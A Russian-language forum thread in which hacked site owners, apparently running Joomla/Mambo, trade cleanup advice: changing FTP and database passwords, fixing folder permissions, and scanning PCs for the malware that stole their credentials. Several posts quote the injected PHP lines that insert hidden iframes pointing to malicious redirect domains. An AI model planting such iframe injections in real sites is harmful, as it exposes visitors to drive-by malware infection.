Сайт взломали. Удалось восстановить, но вопрос безопасности остался актуальным

Может ещё к базе пароли поменять?
Долго ли их по ФТП из конфига прочесть...
И проверить, нет ли на сайте папок с правами 777.
Кэш сайта временно запретить и очистить.
Теоретически не должны пролезть.

 

ок, и к базе счас пароль поменяю... в коре сайта все папки с правами 755..

Но проблема таки остается!
самом index.php сайта его нету, если открываю сайт в хтмл не заходя в админку тож нету..
а вот когда открываю из админки (открывается в блокноте в файле index2(1))

где и что подчистить нужно?

 

а как это сделать? что надо искать? какие-нить посторонние файлы?
я уже все папки с файлами index.php (html) почистил от этого левого кода + проверял все пространство встроенным антивирусом из cPanel'и
как можно найти этот самый источник?

 

Прочитай еще все раз описанное выше, это не тот случай, когда решишь все проблемы что то, где то поправив. Антивирусом на хостинге ничего найдешь, потому что там его нет. Там есть небольшой код, который ведет пользователя зашедшего на твой сайт на другой сайт, где ему и "ставят" трояна. Вирус у тебя на компьютере.....

 

Ирина Ревин, заходишь через тотал коммандер на фтп в корень сайта, прописываешь код айфрэйма в ключевых словах в поиске, он выдаст список файлов содержащих код, редактируешь их и радуешься )

 

Уже)) Все почистила руками, поменяла пароли на базы, фтп и админку.. радуюсь, пока рецидива не наблюдается)

 

Народ, Вы чего тупые чтоли, не ужели никто не заметил что редирект идет на cocacolaN, то есть данный чел заразил мимнимум 65 сайтов, отсюда делаем вывод.


1. проверьте свой форум phpbb- дрявый он жуть
2. наверное у Вас регистрация на сайте разрешена? Если разрешена в 0.15 то лучше запретите ее, объяснять не буду, сами не глупые надеюсь
3. ставим на все 755 права, а не 777
4. не используем постороннии компоненты
5. на порно сайты ходим быстро и поделу. И желательно с чистой машины.
6. Ставим лицензионную винду.

Ну и самый надежный способ не выходим в интернет вообще.

 

Мама, а такое бывает?
По сабже лучше лицензионнный Линукс, тогда и порно не отменяется

 

или фри линух, винда обсалютно не причем всякой дряни повидал, и та и та заражаеться как делать нефиг, и не согласен

Код (CODE):

1. Народ, Вы чего тупые чтоли

люди помочь пытаются, а зайти и "кинуть в толпу гадости" каждый может.

 

Именно в ей он живет (вирь)

 

какая бы винда не была, любая может быть заражена виром, без исключений

 

Вчера была атака, после чего шаблон сайта вырубила ошибками, а в index как шаблона так и админа появились строчки

Код (CODE):

1. <?php mosLoadAdminModules( 'debug' );
2. echo "<iframe src=\"http://live-counter.net/?click=24692890\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
3. ?>

по url требуют пароль, а на втором нет ничего. что делать, каспер при открытие сайта ругнулся трояном!

 

Тема стала актуальной, может есть повод написать развернутый фак по основам защиты

 

а что антивирусы совсем лысые?

 

Если вирь не занесен в базу и не ведет себя как слон в посудной лавке

 

Тож недавно поломали, код был прописан где только можно

echo "<iframe src=\"http://goooogleadsence.biz/?click=3D5B003\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://live-counter.net/?click=9703578\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

echo "<iframe src=\"http://xtrarobotz.com/?click=24EC45\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

посмотрел логи на сервере, все заливалось через фтп, сменил пароли на все...
При проверке компьютера доктор вебем (последним) вирусов не обнаружено, зато Outpost постоянно пресикает попытки что либо скачать всякими не понятными экзешниками, а так же изменения файлов.
Буду ставить другой антивирь, пока на ftp не логинюсь... боюсь опять пароль уйдет

 

Для защиты рекомендую Avira для лечения - AVZ

 

касперский нашел 2 вируса, один из них сидел в тотал командере (через который я заливал все на фтп)... надеюсь теперь будет все нормально

 

Ненормально то что они попали в систему!!!

 

да да да
меня нортон бережотт корпоративный
а тотолами вообще не пользуюсь (ибо корпоративный прокси (ограничение по портам (против инет вирусов)) по моему гораздо для управления сайтом использовать отдельный браузер https, ssh туннель, пропуская всё это гомно через vpn туннель....